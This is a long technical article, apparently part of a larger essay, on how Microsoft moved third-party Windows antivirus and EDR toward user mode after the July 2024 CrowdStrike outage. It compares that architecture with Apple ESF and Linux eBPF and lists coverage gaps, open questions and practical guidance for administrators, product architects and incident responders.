On September 10, 2024, Microsoft hosted the WESES summit -- the Windows Endpoint Security partner gathering, often abbreviated WESES in trade press -- at its Redmond campus. The attendees included CrowdStrike, Sophos, ESET, SentinelOne, Trend Micro, and Bitdefender, plus U.S. and European government officials [@weston-2024-09-12]. David Weston, Microsoft's vice president for enterprise and operating system security, recapped the summit in a Windows Experience Blog post on September 12, 2024 -- two days later -- and made two specific commitments on Microsoft's behalf. First, Microsoft committed publicly to Safe Deployment Practices as a shared cross-vendor norm. Second, Microsoft committed to "additional security capabilities outside of kernel mode" as a platform direction [@weston-2024-09-12]. No new branded platform yet, no GA date, no API surface. But the political commitment was, for the first time on the public record, an architectural one.

A Microsoft program documenting the requirements third-party antivirus and endpoint security vendors must meet to ship products that integrate with Windows -- including Security Center registration, ELAM (Early-Launch Anti-Malware) participation, and Defender exclusion negotiation [@mslearn-mvi]. MVI is the contractual surface Microsoft uses to require Windows AV vendors to engineer in particular ways; updates to MVI requirements have been the principal lever for the post-Channel-File-291 reforms.

November 19, 2024: Microsoft Ignite, and the Windows Resiliency Initiative

Two months later, at Microsoft Ignite on November 19, 2024, Weston announced the program by name: the Windows Resiliency Initiative, four pillars (reliability including Quick Machine Recovery, fewer administrator-privileged apps, stronger app and driver allow-lists, and identity hardening), and a verbatim commitment that "a private preview will be made available for our security product [partner cohort] in July 2025" [@ms-ignite-2024-11-19]. The "private preview" referred to a new set of user-mode EDR APIs that Microsoft would deliver to a small named cohort of MVI partners. The Ignite post is also the first source to introduce Quick Machine Recovery publicly -- the post-outage recovery primitive engineered specifically to address the on-disk-persistence pathology that Channel File 291 had exposed [@ms-ignite-2024-11-19].

Microsoft's descriptive phrase, used consistently in Weston's June 26, 2025 blog and the November 18, 2025 Windows Experience Blog post, for the new user-mode API surface that lets third-party EDR products subscribe to kernel-curated security telemetry without loading their own kernel driver [@weston-2025-06-26, @ms-nov-2025]. Microsoft has not, as of mid-2026, branded this as a single trademarked proper noun; trade-press shorthand like "WESP" should be treated as commentary, not as a Microsoft product name.

Note: You will see "WESP" -- Windows Endpoint Security Platform, capitalized -- in trade-press coverage and conference talks. As of mid-2026 it is not a Microsoft brand. Microsoft's own primary-source language is the descriptive phrase "the Windows endpoint security platform" (lowercase, no acronym) [@weston-2025-06-26, @ms-nov-2025]. This article uses the Microsoft phrasing throughout.

June 26, 2025: the WRI detailed rollout and MVI 3.0

The most consequential single document in the entire WRI story is Weston's June 26, 2025 Windows Experience Blog post [@weston-2025-06-26]. The post commits, verbatim, that "Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners... security products like anti-virus and endpoint protection solutions can run in user mode just as apps do" [@weston-2025-06-26]. That second clause is the architectural commitment in one sentence: third-party EDR on Windows runs in user mode, like every other application on Windows.

The same June 26 post names the MVI partner cohort by company -- Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure -- and embeds on-record statements from five of them (CrowdStrike, ESET, SentinelOne, Sophos, Trellix, and Trend Micro and WithSecure also published quotes) endorsing the migration [@weston-2025-06-26]. The post lays out the requirements of MVI 3.0: Safe Deployment Practices, deployment rings, monitored rollouts, and incident-response testing [@mslearn-mvi]. The November 18, 2025 Windows Experience Blog later established the MVI 3.0 effective date as April 1, 2025 [@ms-nov-2025].

MVI 3.0 requirement	What it mechanically requires	What it does not mechanically verify
Safe Deployment Practices	Vendor publishes a documented deployment process for sensor and content updates	That the published process is correctly enforced in the vendor's release pipeline
Deployment rings	Vendor segments customers into staged rollout cohorts (e.g., internal, canary, GA)	That ring promotion gates actually halt a rollout when a stop-signal fires
Monitored rollouts	Vendor monitors signal data during each ring transition	That the monitoring catches a Channel-File-291-class latent bug
Incident-response testing	Vendor runs scheduled incident-response drills against its own rollout pipeline	That drill outcomes generalize to a novel failure mode never tested

The cohort of named MVI 3.0 partners is the same cohort Apple's Endpoint Security framework migration targeted in 2019. The overlap is not coincidence -- the same companies sell EDR on both platforms, and the same companies are now multi-OS migrating onto the same architecture (user-mode, platform-curated telemetry). The trade press has yet to fully appreciate that the WRI is not a Microsoft-specific architecture choice; it is the second platform vendor making the same choice.

The Ionescu pivot

The single most consequential individual move in the entire two-year story is dated April 3, 2025: CrowdStrike named Alex Ionescu -- co-author of the Windows Internals book series, long-time Windows kernel researcher, and former CrowdStrike employee returning to the company -- as Chief Technology Innovation Officer with an explicit charter to "lead CrowdStrike's participation in the Microsoft Virus Initiative Program (MVI 3.0), working with Microsoft to advise on the implementation of the next-generation vendor security stack for Windows" [@cs-ionescu-ctio-2025-04-03]. Ionescu then published an on-record endorsement of Microsoft's user-mode EDR architecture in Microsoft's own June 26, 2025 Windows Experience Blog post [@weston-2025-06-26].

Key idea: The foremost public Windows kernel researcher in the industry, now CTIO of the company whose kernel driver brought down 8.5 million Windows hosts, is on the record endorsing Microsoft's eviction of vendor kernel-mode antivirus. That is the political signal July 19, 2024 produced, and it is structurally unlike anything that preceded the outage. In 2006, the vendors fought; in 2025, the foremost vendor kernel expert is helping Microsoft build the replacement.

November 18, 2025: the update and the graphics-driver exemption

The most recent Microsoft primary-source document in this article is the November 18, 2025 Windows Experience Blog post [@ms-nov-2025]. Three points in that post matter for the rest of this article. First, "effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners" -- this sets the formal effective date of MVI 3.0 [@ms-nov-2025]. Second, "in June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode" -- the framing is AV enforcement generally, not third-party AV enforcement specifically, which by plain reading commits Defender for Endpoint to the same architectural trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. Third, the graphics-driver exemption: "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-nov-2025]. That single concession draws the scope of the WRI cleanly: it is an AV enforcement migration, not a third-party kernel driver elimination program.

Quick Machine Recovery

One more piece of the response deserves explicit mention: Quick Machine Recovery (QMR), the platform-level recovery primitive Microsoft built specifically in response to the on-disk persistence pathology of Channel File 291. QMR is a remote-remediation flow, managed via the Configuration Service Provider model and surfaced as the RemoteRemediation CSP, that can boot a failing Windows host into a recovery environment and apply targeted fixes without manual safe-mode intervention by an administrator [@mslearn-qmr]. The capability first appeared in Windows Insider builds beginning with Build 26120.4230 on June 2, 2025 [@insider-build-26120-4230]. QMR does not, on its own, prevent another Channel-File-291-class event; it makes the recovery from one orders of magnitude cheaper.

flowchart LR A["2024-07-19 Channel File 291 outage, 8.5M hosts"] --> B["2024-07-27 Microsoft secblog publishes WinDBG dump"] B --> C["2024-09-10 WESES summit at Redmond"] C --> D["2024-09-24 House Homeland Security hearing"] D --> E["2024-11-19 Ignite, WRI announced by name"] E --> F["2025-04-01 MVI 3.0 effective"] F --> G["2025-04-03 Ionescu CTIO at CrowdStrike"] G --> H["2025-06-26 WRI detailed rollout, partner cohort"] H --> I["2025-07 private preview to MVI 3.0 partners"] I --> J["2025-11-18 AV enforcement shifts to user mode"]

The U.S.-government context is worth one paragraph of framing. The Government Accountability Office's GAO-24-107733, the Congressional Research Service's IF12717 brief, the House Homeland Security Subcommittee hearing on September 24, 2024, the CISA running alert, and the contemporaneous CyberScoop coverage all converge on the same posture: the July 19 outage was a supply-chain and Safe-Deployment-Practices event, not a cyberattack [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030, @meyers-testimony, @cisa-alert-2024-07-19, @cyberscoop-meyers]. The federal response shaped the political environment in which Microsoft chose to announce the WRI; it did not, by itself, design the architecture. The architecture Microsoft picked had been hiding in plain sight for years on two other operating systems, which is the subject of section 7.

7. Apple ESF, Linux eBPF, and the Comparative Architecture

Microsoft did not invent the architecture it is shipping. Two other major operating systems had already picked a different answer years earlier, in opposite directions, and Microsoft's own platform team had been quietly experimenting with both for years before committing to one in public. The comparative-architecture frame matters because it tells us what is genuinely novel about the WRI (very little) and what is genuinely novel about the political moment (almost everything).

Apple Endpoint Security framework, October 7, 2019

On October 7, 2019, with the release of macOS 10.15 Catalina, Apple deprecated third-party kernel extensions for security tools and replaced them with the Endpoint Security framework, a user-space API for authorization (ES_EVENT_TYPE_AUTH_*) and notification (ES_EVENT_TYPE_NOTIFY_*) events fired by the macOS kernel and consumed by Apple-signed user-mode system extensions written by third-party vendors [@apple-esf-docs].

Apple's user-space-only API for security tools, introduced with macOS Catalina (10.15) in October 2019 [@apple-esf-docs]. ESF clients run as system extensions in user mode, subscribe to authorization and notification events emitted by the macOS kernel (process creation, file open, network connect, etc.), and may return `ES_AUTH_RESULT_DENY` to block authorization events synchronously. There is no third-party kernel code path; the kernel signals the user-space client, and the user-space client decides.

What makes ESF the cleanest reference point for the WRI is that ESF is the architecture Microsoft is now shipping under a different label. Both are platform-curated user-mode subscription APIs. Both eliminate third-party kernel drivers from the AV path. Both retain a synchronous authorization gate that lets the vendor's user-mode code answer "allow or deny" before the operating system completes the operation.

The September 2024 Sequoia bug -- the natural experiment we met in section 4 -- is the cleanest available test of whether the ESF architecture contains the blast radius of a 1st-party platform regression. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all lost network filtering when macOS 15 deprecated the Application Firewall property-list interface [@bleepingcomputer-sequoia, @securityweek-sequoia]. None of them brought down macOS. The hosts kept running. Apple shipped 15.0.1 three weeks later [@techcrunch-sequoia]. The Sequoia outage tested the architecture and the architecture held: feature regression, yes; kernel panic at fleet scale, no.

Linux eBPF, and eBPF for Windows

The Linux answer to the same question is in a different direction entirely. Linux does not move EDR out of kernel mode; it keeps EDR in kernel mode and proves the in-kernel code safe before executing it. The technology is extended Berkeley Packet Filter (eBPF), a kernel-resident bytecode virtual machine that runs vendor-supplied probes attached to kernel hook points, with a static verifier that rejects any program whose memory accesses, control flow, or loop bounds cannot be proven safe at load time [@lwn-bounded-loops].

A Linux kernel subsystem that runs vendor-supplied bytecode programs in kernel context, gated by a static verifier that rejects programs whose memory accesses or control flow cannot be proven safe at load time. eBPF programs attach to hook points (syscall enter/exit, file system events, network packets, tracepoints) and emit data to user space via ring buffers and maps. The Linux EDR industry (Cilium, Tetragon, Falco) is built on eBPF [@lwn-bounded-loops].

The eBPF verifier is non-trivial. Jonathan Corbet's June 2019 LWN article "BPF and bounded loops" describes the Linux 5.3 extension that lifted the original verifier's strict no-loops restriction, permitting bounded loops with statically-determinable trip counts -- enough to write nontrivial in-kernel programs without sacrificing the verifier's termination guarantee [@lwn-bounded-loops]. Every major Linux EDR product in 2026 ships an eBPF probe set as its primary collection substrate.

Microsoft has eBPF for Windows. Microsoft has had eBPF for Windows publicly on GitHub since May 2021, ported the PREVAIL verifier as its formal foundation, and continues to develop the project at the same repository [@msft-ebpf-windows, @ebpf-windows-commits].PREVAIL is the academic verifier whose formal soundness arguments are the foundation of eBPF for Windows. Its design takes the same general approach as the Linux verifier -- abstract interpretation over the bytecode's control flow graph -- and shipped as the open-source verifier Microsoft adopted for the Windows port. Microsoft has shipped eBPF for Windows for networking-centric use cases (XDP-style packet filtering); EDR has not been the primary published use case [@msft-ebpf-windows]. What Microsoft has not done is make eBPF for Windows the substrate of the WRI's third-party EDR architecture. The WRI commits to the Apple-style "exit the kernel" answer, not the Linux-style "stay in the kernel but verifier-bounded" answer.

The three architectural answers

There are exactly three serious architectural answers to the question of where the third-party security observer runs.

Exit the kernel: subscribe from user mode against a platform-curated broker. Apple ESF since 2019; Windows endpoint security platform since the July 2025 private preview.
Stay in the kernel, but only as a verifier-bounded extension. Linux eBPF; eBPF for Windows since 2021.
Operate from below the kernel, in the hypervisor. The Garfinkel and Rosenblum NDSS 2003 origin paper on virtual machine introspection [@wiki-vmi], the Xen Project's VMI APIs [@xen-vmi], Bitdefender's Hypervisor Introspection product shipped commercially in 2016 [@xen-vmi], and Microsoft's own in-platform Virtualization-Based Security (VBS), Hypervisor-protected Code Integrity (HVCI), and Secure Kernel features [@mslearn-hvci].

flowchart TD Q["Where does the third-party security observer run?"] Q --> A1["1. User mode, subscribing via platform broker"] Q --> A2["2. Kernel mode, verifier-bounded extension"] Q --> A3["3. Hypervisor, below the guest kernel"] A1 --> A1a["Apple ESF, since 2019"] A1 --> A1b["Windows endpoint security platform, since 2025"] A2 --> A2a["Linux eBPF"] A2 --> A2b["eBPF for Windows, since 2021"] A3 --> A3a["Bitdefender Hypervisor Introspection, 2016"] A3 --> A3b["Microsoft VBS, HVCI, Secure Kernel"]

Why Microsoft picked (1) over (2)

This is one of the article's most interesting decisions, and the public reasoning is mostly implicit. The eBPF answer (2) would have required every EDR vendor to rewrite on a substrate they had no muscle memory for. The Linux EDR industry took roughly five years to converge on eBPF as its dominant collection mechanism, and Windows EDR vendors have invested in a different abstraction (kernel callbacks plus minifilters) for twenty-five years. A migration to eBPF for Windows would have meant a multi-year vendor-side rewrite to a verifier whose published EDR-attach-point coverage in mid-2026 was incomplete [@msft-ebpf-windows].

The Apple-style answer (1), by contrast, lets vendors keep most of their detection logic where it already runs -- in user-mode sensor processes -- and only replaces the Ring-0 collection substrate with a platform broker. The migration is incremental rather than ground-up. And answer (1) carries a second structural advantage: even a perfect eBPF verifier still leaves vendor bytecode running inside the kernel, where a content-validator failure can still produce a runtime fault under a verifier that proved safety at load time. Answer (1) makes the question unaskable by construction: there is no third-party kernel code path, so a third-party content-validator failure cannot crash the kernel.

Microsoft made a comparative-architecture bet. The bet has a known cost: things a kernel-mode observer can see that a user-mode observer cannot. What exactly does the user-mode EDR lose? That is section 8.

8. What User-Mode EDR Cannot See

Every architectural choice closes some doors. The user-mode EDR architecture closes the door on Channel-File-291-class reliability incidents -- by construction, a vendor-authored data file consumed by a vendor-authored user-mode process can crash the vendor process, not the host. The same architecture, on its own, opens three coverage doors a kernel-callback EDR closed. This section enumerates them honestly.

Gap 1: direct syscall observation

A malicious user-mode process can issue x86-64 syscall instructions directly, bypassing ntdll.dll's exported stubs and therefore bypassing any user-mode hook layer that depends on patching those stubs [@mdsec-direct-syscall]. MDSec's December 2020 write-up "Bypassing user-mode hooks and direct invocation of system calls for red teams" documented the technique in operational detail: an attacker recovers the syscall numbers from a clean copy of ntdll, emits the syscall instruction inline in their own payload, and the operating system services the syscall without ever touching the hook layer the EDR vendor injected into ntdll [@mdsec-direct-syscall]. A user-mode EDR sees only what the platform broker tells it. For the broker to maintain coverage of direct-syscall payloads, the broker itself must be wired into the syscall dispatch path -- the place inside nt!KiSystemServiceCopyArgs where the kernel dispatches user-mode syscalls -- and emit telemetry for every syscall, not only those that arrive via the ntdll stubs.

Microsoft has stated this architecture is in scope but has not published the wire-format detail of the syscall broker as of mid-2026. The honest reading: Microsoft owns this gap, it knows it owns this gap, the EDR partners know Microsoft owns this gap, but the specific shape of the broker's syscall-path integration has not been publicly documented. Treat any third-party claim about the broker's syscall-path wire format as speculation.

Gap 2: rootkit visibility, and the hypervisor answer

A kernel-mode rootkit -- loaded via a Bring-Your-Own-Vulnerable-Driver attack against a signed-but-vulnerable third-party driver -- can hide processes, files, registry keys, and network state from any user-mode observer. The platform broker will emit whatever the kernel sees about the system state; if the rootkit lies to the kernel via DKOM, the broker will faithfully emit the lie.

An attack technique in which a malicious user-mode payload loads a signed, legitimately-issued kernel driver that has a known unfixed vulnerability, then exploits the driver's vulnerability to gain Ring-0 code execution. Because the driver is legitimately signed, neither Windows driver-signing enforcement nor most heuristic load-time defenses block the initial driver load; the attacker gets kernel privilege via a third-party driver they did not have to author or sign themselves.

Microsoft's stated answer for the rootkit-visibility gap is to layer a generation of hypervisor-assisted memory introspection below the user-mode EDR. Bitdefender shipped the first commercial Hypervisor Introspection product in 2016 on top of Xen [@xen-vmi]. Academic work has continued: The Reversing Machine (Karvandi et al., May 2024, arXiv:2405.00298) describes a contemporary research-grade implementation using Intel Mode-Based Execution Control to intercept user-kernel mode transitions and a suspended-process-creation technique to attach hypervisor-based introspection to running guests transparently [@trm-arxiv-2405-00298].

Microsoft's family of in-platform virtualization-based security primitives. *Virtualization-Based Security (VBS)* runs a Hyper-V-derived hypervisor below the Windows kernel, creating two virtual trust levels (VTL0 for the normal kernel, VTL1 for the Secure Kernel). *Hypervisor-protected Code Integrity (HVCI)* enforces that kernel-mode pages are either writable or executable but never both, and that only signed code can be loaded into kernel mode; the enforcement runs in the Secure Kernel and cannot be subverted from VTL0 [@mslearn-hvci].

The Microsoft-side equivalent of the Bitdefender HVI architecture is the family of platform features documented under VBS, HVCI, and the Secure Kernel [@mslearn-hvci]. The Secure Kernel is, architecturally, exactly the vantage from which a hypervisor can read guest memory authoritatively and answer questions about kernel state that the guest kernel itself cannot be trusted to answer correctly. Whether the Windows endpoint security platform's broker will surface that authoritative read to third-party EDR partners -- and through what API -- is part of the not-yet-public detail of the platform.

Gap 3: tamper resistance of the EDR process itself

A user-mode EDR is a user-mode process. Malware that obtains SeDebugPrivilege -- usually by abusing a misconfigured service account or a credential-stealing exploit -- can in principle suspend or terminate the EDR process. The Windows mitigation for this class of attack is Protected Process Light (PPL), the same mechanism Microsoft uses to harden MsMpEng.exe (the Microsoft Defender Antimalware Service) against tampering by anything short of a kernel-mode attacker. Whether the Windows endpoint security platform's user-mode EDR processes will get PPL by default in the private preview, and whether they will get a stronger Protected Process classification, is not documented in any primary source as of mid-2026.

The BYOVD coverage question, with a dated negative finding

The CISA Eviction Strategies Tool countermeasure CM0058 names the four enforcement substrates that activate Microsoft's Vulnerable Driver Block List: "Microsoft's vulnerable driver blocklist is a native utility for Windows 11 2022 and above that receives updates 1-2 times per year... enforced when Hypervisor-protected coded integrity or HVCI, Smart App Control, or S mode is active" [@cisa-cm0058, @mslearn-driver-block-rules]. The block list itself is a Microsoft-maintained allow-list of non-allowed kernel drivers -- specifically, the signed-but-vulnerable drivers known to be abused for BYOVD attacks.

Note: Neither CISA's CM0058 page nor any Microsoft public document publishes aggregate telemetry on what fraction of Windows enterprise endpoints have any of the four enforcement substrates (HVCI, Smart App Control, S Mode, or App Control for Business) active in mid-2026 [@cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations; Microsoft has not aggregated those recommendations into a fleet-level statistic. The BYOVD enforcement coverage gap is known qualitatively (the block list exists; enforcement is opt-in via four substrates; updates are infrequent) but cannot be quantified from public evidence.

The kernel attack surface that nothing in user mode can observe

Below all of this -- below user-mode EDR, below kernel-mode EDR, below the Secure Kernel -- lies the genuine bottom of the stack: bootkits, System Management Mode resident malware, firmware implants, and pre-boot attacks that compromise the host before any antivirus product has loaded. No user-mode EDR can meaningfully observe any of this. No kernel-mode EDR can fully observe any of this either. The platform answers are Secured-core PC, Microsoft Pluton, and Measured Boot -- platform-curated, Microsoft-owned, hardware-rooted defenses that the third-party industry does not write code inside of. The WRI does not close the firmware gap; it delegates the firmware gap to Microsoft platform features. That delegation is exactly what Microsoft has always wanted (the platform owns the security boundary) and exactly what vendors have always resisted (the platform owns the security boundary). July 19, 2024 is the day vendors stopped publicly resisting.

The coverage matrix

The coverage tradeoffs in one table. Cells mark the architecture's native ability to observe each visibility primitive: full coverage, partial coverage, or none.

Visibility primitive	Kernel-callback EDR	User-mode EDR + broker	Hypervisor introspection	Microsoft platform features
Direct syscall (no `ntdll` stub)	full (via syscall path hooks)	partial (depends on broker wire format)	full (from VTL1)	full (by construction)
Rootkit visibility (DKOM)	partial (rootkit can subvert peer-driver views)	none (broker reflects kernel-reported state)	full (authoritative memory read)	full (via Secure Kernel)
Tamper resistance of the EDR process	partial (kernel access lets attacker disable peer driver)	partial (PPL needed)	full (out of band)	full (Defender uses PPL today)
BYOVD detection	partial (post-load only)	none (vendor cannot reload kernel)	partial (post-load, via VTL1 inspection)	full (Vulnerable Driver Block List + HVCI, where enabled)
Bootkit, SMM, firmware visibility	none	none	partial (pre-OS attestation only)	full (Secured-core PC, Pluton, Measured Boot)

Key idea: The user-mode EDR architecture closes the reliability problem (a Channel-File-291-class bug crashes a user-mode process, not the kernel). It does not, on its own, close the coverage problem. The coverage problem is being delegated from vendor EDR to Microsoft platform features -- to the Vulnerable Driver Block List, to HVCI, to the Secure Kernel, to Pluton, to Defender's baseline detection coverage. Whether that delegation reaches Method-A coverage equivalence is the open architectural question of mid-2026, and the honest answer is "we do not yet know."

What else is genuinely open? That is section 9.

9. What Is Still Open in mid-2026

What does the honest answer look like, twenty-three months after the outage and twelve months after the WRI's detailed rollout? Several dated negative findings and one positive finding, and the right epistemic posture for reading them is the same posture security engineers should bring to any architectural transition in flight: the absence of an announcement is its own evidence.

Has Microsoft committed to a date by which third-party AV kernel drivers will be forbidden?

No primary source uses the words "ban" or "deadline" or any equivalent hard-stop phrasing. The November 18, 2025 Microsoft Windows Experience Blog frames the program as an enforcement migration -- "shifts AV enforcement from the kernel to user mode" -- and the June 26, 2025 Weston post commits to the private preview as a step in a partner-coordinated journey, not as the first of two phases ending in a third-party kernel-driver lockout [@ms-nov-2025, @weston-2025-06-26]. The article describes the transition as multi-year, partner-coordinated, and without a published hard deadline as of mid-2026. Anyone telling you Microsoft has committed to a date is reading something into the public record that the public record does not contain.

Will the WRI user-mode EDR APIs reach feature equivalence with today's kernel-callback EDR?

The on-record partner statements quoted in the June 26, 2025 blog use hedging language: "continue to provide feedback," "no degradation in security or performance," and similar [@weston-2025-06-26]. That phrasing is not a claim of equivalence achieved; it is a claim of commitment to work toward equivalence. The strongest evidence equivalence is reachable is Apple's seven-year ESF deployment: by 2026, every major Windows-side EDR vendor also ships a macOS-side ESF-based product, and the macOS-side product is broadly considered competitive in detection coverage with peer kernel-based products on other platforms. The Windows answer for mid-2026 is empirically unknown -- the API surface is in active evolution, and the partner cohort is still inside the private preview.

Has any MVI 3.0 deployment ring actually halted a vendor content update since June 26, 2025?

This is the most important operational question and the one with the most honest negative answer. No public primary source documents either a ring stop-gate event (an MVI 3.0 partner caught a latent Channel-File-291-class bug at a canary ring and halted the rollout before fleet propagation) or a ring-escape incident (a latent bug got through the rings and produced a fleet event) from any of the eight named MVI 3.0 partners through the most recent search horizon. The SentinelOne May 29, 2025 cloud control-plane outage [@sentinelone-may-29-rca] is structurally orthogonal to the failure mode the rings are designed to catch -- per SentinelOne's own RCA, "a software flaw in an outgoing infrastructure control system triggered an automatic function that removed critical network routes" and "customer endpoints remained protected" throughout -- so it does not stress-test the rings. The honest framing has two competing readings: the rings are working silently, or the rings have not yet been stress-tested by a Channel-File-291-class latent bug in any partner's content pipeline. Neither reading can be discriminated from current public evidence.The SentinelOne May 29, 2025 event is the closest post-WRI partner-side reliability incident on the public record, and it is worth a paragraph of distinction. The failure was a cloud control-plane network-routes deletion that knocked SentinelOne's customer-facing management console offline; per the company's own RCA, customer endpoints remained protected throughout, federal environments were not impacted, and no endpoint content update was involved [@sentinelone-may-29-rca]. The event is exactly the kind of reliability incident the MVI 3.0 rings are not designed to catch -- the rings address Safe Deployment Practices for sensor and content updates, not cloud control-plane reliability.

Will Microsoft hold itself to the same kernel-out standard as MVI partners?

The November 18, 2025 Microsoft Windows Experience Blog uses the framing "AV enforcement" (not "third-party AV enforcement") -- by plain reading this commits Microsoft Defender for Endpoint to the same trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. The article notes this as the closest available public Defender-kernel-out signal, while being honest that no Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out the graphics-driver exemption [@ms-nov-2025] -- which by plain reading means that non-AV third-party kernel drivers will continue to ship under the existing model. The WRI is, narrowly, an AV-enforcement migration.

In June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode... Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft Windows Experience Blog, November 18, 2025 [@ms-nov-2025]

Note: The MVI 3.0 ring question -- has any partner actually halted a rollout at a ring boundary since June 26, 2025? -- admits two readings from current evidence. Reading one: the rings are working silently, catching latent bugs that never become public, because the entire point of a working ring is that nothing happens. Reading two: the rings have not yet been stress-tested by a Channel-File-291-class latent bug at any partner. Both readings are consistent with the dated negative finding "no public stop-gate event has been documented." Anyone telling you they know which reading is right is overclaiming. The right epistemic posture is to keep watching, and to read partner-side RCAs as they appear.

What fraction of enterprise Windows endpoints enforces the Vulnerable Driver Block List?

The CISA CM0058 page is the canonical document and it publishes no enablement telemetry [@cisa-cm0058]. Microsoft's own documentation for the block list publishes update cadence (one to two times per year) and a per-substrate description of where the block list activates (HVCI, Smart App Control, S Mode, or App Control for Business) but no aggregate fleet-level enablement statistic [@mslearn-driver-block-rules, @cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations but does not aggregate. The BYOVD enforcement gap is known qualitatively and cannot be quantified from public evidence as of mid-2026. Anyone publishing a percentage figure for HVCI enablement across the global Windows enterprise fleet is publishing a guess.

These are five open questions with five honest answers. The reader leaves section 9 knowing not the answers, but the shape of the questions -- which is the right epistemic state in which to read the practical guide that follows. What should you do, mid-2026, with this knowledge? That is section 10.

10. Practical Guide for mid-2026

Three audiences, three different sets of next moves. The article has been writing for these three audiences since the first paragraph -- the Windows enterprise administrator, the security-product architect, and the incident responder -- and each gets a short, concrete checklist that respects the open architectural questions of section 9.

For the Windows enterprise administrator

Treat your antivirus and EDR vendor's update cadence as part of your fleet's blast radius. The cadence of vendor content updates is, in mid-2026, the operational variable most likely to produce your next mass-availability incident. Ask your vendor for their MVI 3.0 documentation and verify they are running staged deployment rings rather than gating only at a single global GA promote [@mslearn-mvi, @weston-2025-06-26].
Enable Quick Machine Recovery on Windows 11 24H2 and later [@mslearn-qmr]. QMR is the platform-level recovery primitive Microsoft built specifically for Channel-File-291-style on-disk persistence pathology, and it materially reduces recovery time for any future event that produces unbootable hosts at scale [@insider-build-26120-4230].
Enable HVCI / Memory Integrity wherever your hardware supports it [@mslearn-hvci]. HVCI is one of the four substrates that activates Microsoft's Vulnerable Driver Block List, and enabling it brings the BYOVD blocklist from a published-but-inert resource to an enforced runtime control on your endpoints [@mslearn-driver-block-rules, @cisa-cm0058].
If your fleet still depends on a kernel-only AV stack, push your vendor for their Method-C (user-mode) roadmap commitments. The MVI 3.0 partner cohort named in Weston's June 26, 2025 post is the right reference list: vendors not on it have not made a public commitment of equivalent specificity, and that should affect your procurement calculus [@weston-2025-06-26].
Audit your Defender exclusion list. The principle of least privilege applies to your AV configuration just as much as to your user accounts -- every exclusion is a path past your detection coverage, and Defender exclusions inherited from 2018 deployments are a routine finding in modern enterprise audits.

For the security-product architect

Apply for MVI 3.0 partnership and request access to the Windows endpoint security platform private preview now [@mslearn-mvi]. The API surface is in active evolution and partner feedback is materially shaping the contract. Vendors who wait for GA will inherit a contract written by competitors.
Plan a migration roadmap from kernel callbacks (Method A) to user-mode subscription (Method C). Assume Method A remains the bridge for several more years and that a hybrid Method-A-plus-Method-C deployment will be your production reality through at least the late 2020s. Engineer for Method C as the future-primary substrate while Method A continues to carry production detection coverage.
Engineer your content delivery pipeline as if the platform will eventually require ring-based staged deployment under contractual gating. The MVI 3.0 deployment-ring requirements are the model: internal ring, canary ring, GA ring, with monitored promotion gates between each [@weston-2025-06-26]. Build the pipeline now even if the contractual requirement does not yet bind you, because the alternative is rebuilding it under emergency pressure later.
For BYOVD coverage and rootkit visibility you cannot get from user mode, design around platform features rather than rebuilding them yourself. The Vulnerable Driver Block List, HVCI, Secured-core PC, Pluton, and Defender's baseline are platform-curated controls; layer your detection coverage on top of them rather than parallel to them [@mslearn-driver-block-rules, @mslearn-hvci, @cisa-cm0058].
Treat the Apple ESF deployment as your reference implementation. Your macOS-side ESF migration -- which most major Windows EDR vendors completed between 2019 and 2024 -- is the closest analogue to the Windows-side migration you are now starting. The architectural lessons transfer; do not repeat the early-ESF mistakes on the Windows side.

For the incident responder

The on-disk artifacts from the July 19 outage -- C-00000291*.sys channel files, the minidumps with csagent.sys+0x... frames -- are the canonical reference set for "vendor-content-update-bug-checks-kernel-driver" investigations [@ms-secblog-2024-07-27]. Treat any future "vendor module + nt!KiPageFault + unmapped address" stack as structurally analogous and apply the same runbook posture.
The next analogous incident will look the same in the dumps. The faulting module name will be different; the offset will be different; the unmapped address will be different. The pattern -- vendor kernel module, page fault from nt!KiPageFault, unmapped read address in the high half of the canonical address space, PAGE_FAULT_IN_NONPAGED_AREA -- will be identical.
Build playbooks now for "vendor content update reverted but on-disk-persisted" scenarios. QMR is the platform answer [@mslearn-qmr], but your runbook is what gets your fleet through the first hour before a Microsoft-provided recovery flow is appropriate. The first-hour runbook for July 19, 2024 was "safe-mode boot, delete the file, reboot," and it is worth having that runbook in your incident playbook today for the next analogous event.
Document your AV/EDR vendor's incident-response point of contact and their SLA. The July 19 morning was characterized by vendor-side communication latency in the first hour, not by lack of platform recovery options. Pre-staging the vendor's IR contact and your fleet-wide content-revert process will compress your time-to-mitigation by orders of magnitude.

A cross-platform reality check

A practitioner moving from macOS to Windows in 2026 will find that macOS gave them one architecture (Method C since 2019), Linux gave them one architecture in the opposite direction (eBPF dominant), and Windows is the transitional platform where Methods A, B, C, D, E, and F all coexist in different states of deployment. The architectural choice on Windows in 2026 is not "which method"; it is "which combination, and how to migrate from your current combination to your target combination." That is the bridge-year reality, and it will be the bridge-year reality through at least the late 2020s.

Note: Mid-2026 is the bridge year. Your job is to design for the bridge, not for either bank.

11. Common Misconceptions

Six questions a careful reader will already have answered for themselves, restated here for the reader who arrived at this section via the table of contents.

